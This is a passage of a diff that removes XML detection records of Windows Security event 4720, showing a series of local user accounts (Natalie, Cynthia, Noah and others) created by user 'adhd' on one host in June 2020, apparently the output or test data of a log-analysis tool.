Name='SamAccountName'&gt;Ann&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ann</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5071</recordid>
-            <time>2020-06-11 22:05:07.529393300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.5293933Z'/&gt;&lt;EventRecordID&gt;5071&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Natalie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1171&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Natalie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Natalie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5065</recordid>
-            <time>2020-06-11 22:05:07.448398300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.4483983Z'/&gt;&lt;EventRecordID&gt;5065&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Cynthia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1170&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Cynthia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Cynthia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5059</recordid>
-            <time>2020-06-11 22:05:07.363225800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.3632258Z'/&gt;&lt;EventRecordID&gt;5059&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Noah&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1169&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Noah&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Noah</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5053</recordid>
-            <time>2020-06-11 22:05:07.264639100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.2646391Z'/&gt;&lt;EventRecordID&gt;5053&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Terry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1168&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Terry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Terry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5047</recordid>
-            <time>2020-06-11 22:05:07.137208500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.1372085Z'/&gt;&lt;EventRecordID&gt;5047&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Virginia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1167&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Virginia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Virginia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5041</recordid>
-            <time>2020-06-11 22:05:07.65141400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.0651414Z'/&gt;&lt;EventRecordID&gt;5041&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gary&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1166&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gary&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gary</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5035</recordid>
-            <time>2020-06-11 22:05:06.959017500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.9590175Z'/&gt;&lt;EventRecordID&gt;5035&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Denise&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1165&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Denise&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Denise</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5029</recordid>
-            <time>2020-06-11 22:05:06.885112000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.8851120Z'/&gt;&lt;EventRecordID&gt;5029&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Beverly&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1164&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Beverly&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Beverly</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5023</recordid>
-            <time>2020-06-11 22:05:06.803632200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.8036322Z'/&gt;&lt;EventRecordID&gt;5023&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sean&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1163&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sean&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data 